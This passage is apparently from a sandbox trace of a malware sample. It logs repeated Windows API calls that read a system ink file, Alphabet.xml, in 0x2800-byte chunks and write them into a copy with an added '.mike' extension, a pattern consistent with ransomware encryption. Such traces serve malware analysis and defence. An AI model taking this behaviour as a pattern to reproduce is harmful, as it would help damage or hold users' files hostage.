lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x23220 [0042.673] WriteFile (in: hFile=0x264, lpBuffer=0x2195040*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2195040*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.673] CloseHandle (hObject=0x264) returned 1 [0042.675] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.675] GetFileType (hFile=0x264) returned 0x1 [0042.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.675] GetFileType (hFile=0x264) returned 0x1 [0042.675] ReadFile (in: hFile=0x264, lpBuffer=0x2197a80, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2197a80*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.676] CloseHandle (hObject=0x264) returned 1 [0042.676] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.677] GetFileType (hFile=0x264) returned 0x1 [0042.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.677] GetFileType (hFile=0x264) returned 0x1 [0042.677] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x25a20 [0042.677] WriteFile (in: hFile=0x264, lpBuffer=0x21a1fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21a1fe8*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.677] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.677] GetFileType (hFile=0x264) returned 0x1 [0042.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.678] GetFileType (hFile=0x264) returned 0x1 [0042.678] ReadFile (in: hFile=0x264, lpBuffer=0x21a4a28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21a4a28*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.692] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.693] GetFileType (hFile=0x264) returned 0x1 [0042.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.693] GetFileType (hFile=0x264) returned 0x1 [0042.693] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x28220 [0042.693] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.693] GetFileType (hFile=0x264) returned 0x1 [0042.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.693] GetFileType (hFile=0x264) returned 0x1 [0042.693] ReadFile (in: hFile=0x264, lpBuffer=0x21b19d0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21b19d0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.695] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.695] GetFileType (hFile=0x264) returned 0x1 [0042.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.695] GetFileType (hFile=0x264) returned 0x1 [0042.696] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2aa20 [0042.696] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.696] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.696] GetFileType (hFile=0x264) returned 0x1 [0042.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.696] GetFileType (hFile=0x264) returned 0x1 [0042.696] ReadFile (in: hFile=0x264, lpBuffer=0x21be978, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21be978*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.697] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.698] GetFileType (hFile=0x264) returned 0x1 [0042.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.698] GetFileType (hFile=0x264) returned 0x1 [0042.698] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2d220 [0042.698] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.698] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.698] GetFileType (hFile=0x264) returned 0x1 [0042.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.698] GetFileType (hFile=0x264) returned 0x1 [0042.698] ReadFile (in: hFile=0x264, lpBuffer=0x21cb920, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21cb920*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.700] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.700] GetFileType (hFile=0x264) returned 0x1 [0042.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.700] GetFileType (hFile=0x264) returned 0x1 [0042.700] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2fa20 [0042.700] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.701] GetFileType (hFile=0x264) returned 0x1 [0042.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.701] GetFileType (hFile=0x264) returned 0x1 [0042.701] ReadFile (in: hFile=0x264, lpBuffer=0x21d88c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21d88c8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.702] GetFileType (hFile=0x264) returned 0x1 [0042.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.702] GetFileType (hFile=0x264) returned 0x1 [0042.702] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x32220 [0042.703] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.703] GetFileType (hFile=0x264) returned 0x1 [0042.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.703] GetFileType (hFile=0x264) returned 0x1 [0042.703] ReadFile (in: hFile=0x264, lpBuffer=0x21e5870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21e5870*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.704] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.704] GetFileType (hFile=0x264) returned 0x1 [0042.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.704] GetFileType (hFile=0x264) returned 0x1 [0042.704] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x34a20 [0042.705] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.705] GetFileType (hFile=0x264) returned 0x1 [0042.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.705] GetFileType (hFile=0x264) returned 0x1 [0042.705] ReadFile (in: hFile=0x264, lpBuffer=0x21f2818, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21f2818*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.706] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.706] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.706] GetFileType (hFile=0x264) returned 0x1 [0042.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.707] GetFileType (hFile=0x264) returned 0x1 [0042.707] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x37220 [0042.707] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.707] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.707] GetFileType (hFile=0x264) returned 0x1 [0042.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.707] GetFileType (hFile=0x264) returned 0x1 [0042.707] ReadFile (in: hFile=0x264, lpBuffer=0x21ff7c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21ff7c0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.708] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.709] GetFileType (hFile=0x264) returned 0x1 [0042.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.709] GetFileType (hFile=0x264) returned 0x1 [0042.709] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x39a20 [0042.709] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.709] GetFileType (hFile=0x264) returned 0x1 [0042.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.709] GetFileType (hFile=0x264) returned 0x1 [0042.709] ReadFile (in: hFile=0x264, lpBuffer=0x220c768, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x220c768*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.711] GetFileType (hFile=0x264) returned 0x1 [0042.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.711] GetFileType (hFile=0x264) returned 0x1 [0042.711] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x3c220 [0042.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.711] GetFileType (hFile=0x264) returned 0x1 [0042.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.711] GetFileType (hFile=0x264) returned 0x1 [0042.712] ReadFile (in: hFile=0x264, lpBuffer=0x2219710, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2219710*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.715] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.715] GetFileType (hFile=0x264) returned 0x1 [0042.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.715] GetFileType (hFile=0x264) returned 0x1 [0042.716] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x3ea20 [0042.716] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.717] GetFileType (hFile=0x264) returned 0x1 [0042.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.717] GetFileType (hFile=0x264) returned 0x1 [0042.717] ReadFile (in: hFile=0x264, 